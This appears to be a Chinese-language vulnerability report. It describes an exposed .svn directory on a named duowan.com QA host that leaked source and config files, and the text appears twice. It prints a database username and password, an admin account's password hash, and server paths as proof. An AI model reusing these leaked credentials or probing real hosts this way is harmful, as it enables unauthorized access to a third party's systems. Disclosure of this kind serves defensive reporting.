首先是svn泄漏,
http://qa.tank.duowan.com/manage/.svn/entries
但是发现svn查看不了什么文件,但是可以知道大概目录,直接访问久暴露了源码http://qa.tank.duowan.com/manage/sql/dbcfg.py
HOST = '127.0.0.1'
USER = 'tkgame'
PAWD = 'tkgame'
PORT = 0
DBNAME = 'tkt_manage'
#
EXECUTETYPE = 'update'
BUILDSQL = 'table_defines.sql'
UPDATELOG = 'update.ini'
UPDATETABLE = '_db_update_log'
BUILDUPDATESQL = '_db_update_log.sql'
BACKUPSQLPREFIX = 'bk_'
http://qa.tank.duowan.com/manage/sql/table_defines.sql
INSERT INTO `user` (`user_id`, `user_name`, `user_password`, `user_level`, `user_created`) VALUES
(1, 'sixcube', '6511383c766f89361b27f1d0d4f25956', 2, 1338946866);
http://qa.tank.duowan.com/manage/i18n/config.sh
ROOT_PATH=/var/www/wwwroot/tkt/manage
I18N_PATH=$ROOT_PATH/i18n
I18N_DOMAIN=tkt_manage
LANG_LIST=(`/usr/bin/php -q getLangList.php`);
LEN_OF_LANG_LIST=${#LANG_LIST[@]}
首先是svn泄漏,
http://qa.tank.duowan.com/manage/.svn/entries
但是发现svn查看不了什么文件,但是可以知道大概目录,直接访问久暴露了源码http://qa.tank.duowan.com/manage/sql/dbcfg.py
HOST = '127.0.0.1'
USER = 'tkgame'
PAWD = 'tkgame'
PORT = 0
DBNAME = 'tkt_manage'
#
EXECUTETYPE = 'update'
BUILDSQL = 'table_defines.sql'
UPDATELOG = 'update.ini'
UPDATETABLE = '_db_update_log'
BUILDUPDATESQL = '_db_update_log.sql'
BACKUPSQLPREFIX = 'bk_'
漏洞证明:
http://qa.tank.duowan.com/manage/sql/table_defines.sql
INSERT INTO `user` (`user_id`, `user_name`, `user_password`, `user_level`, `user_created`) VALUES
(1, 'sixcube', '6511383c766f89361b27f1d0d4f25956', 2, 1338946866);
http://qa.tank.duowan.com/manage/i18n/config.sh
ROOT_PATH=/var/www/wwwroot/tkt/manage
I18N_PATH=$ROOT_PATH/i18n
I18N_DOMAIN=tkt_manage
LANG_LIST=(`/usr/bin/php -q getLangList.php`);
LEN_OF_LANG_LIST=${#LANG_LIST[@]}